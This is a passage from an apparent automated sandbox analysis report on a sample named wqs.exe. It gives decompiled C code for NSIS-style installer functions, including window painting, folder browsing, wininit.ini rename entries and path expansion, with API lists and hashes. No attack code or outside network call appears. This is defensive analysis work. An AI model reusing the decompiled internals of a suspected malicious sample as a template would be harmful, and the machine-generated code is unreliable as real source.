					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040498A Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x71e40c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x433edc; // 0x72196a
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049D9
SetWindowTextW.USER32(00000000,?), ref: 00404A03
SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
CoTaskMemFree.OLE32(00000000), ref: 00404ABF
lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
lstrcatW.KERNEL32(?,Call), ref: 00404AFD
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F

Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94

Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
Part of subcall function 004067C4: CharPrevW.USER32(?,?,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED

Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00404ADA
A, xrefs: 00404AAD
Call, xrefs: 00404AEB, 00404AF0, 00404AFB

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Call
API String ID: 2624150263-3142480687
Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32(00000000), ref: 004062EB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\AppData\Roaming\wqs.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Strings

%ls=%ls, xrefs: 004061F8
[Rename], xrefs: 0040626C, 0040627E

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D

Uniqueness

Uniqueness Score: -1.00%

Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				intOrPtr _t93;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t93 =  *0x433edc; // 0x72196a
					_t44 =  *(_t93 - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000,00000000,00425A20,75B523A0), ref: 004066A8
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000), ref: 00406779

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll, xrefs: 0040659F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663
Call, xrefs: 004065A4, 00406657, 0040665E, 00406662, 0040667F, 00406694, 004066A7, 004066BC, 004066E9, 0040671E, 00406724, 00406741, 00406754, 00406772, 00406778, 00406781, 004067B7

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-1137395800
Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32(00000000), ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32(?), ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
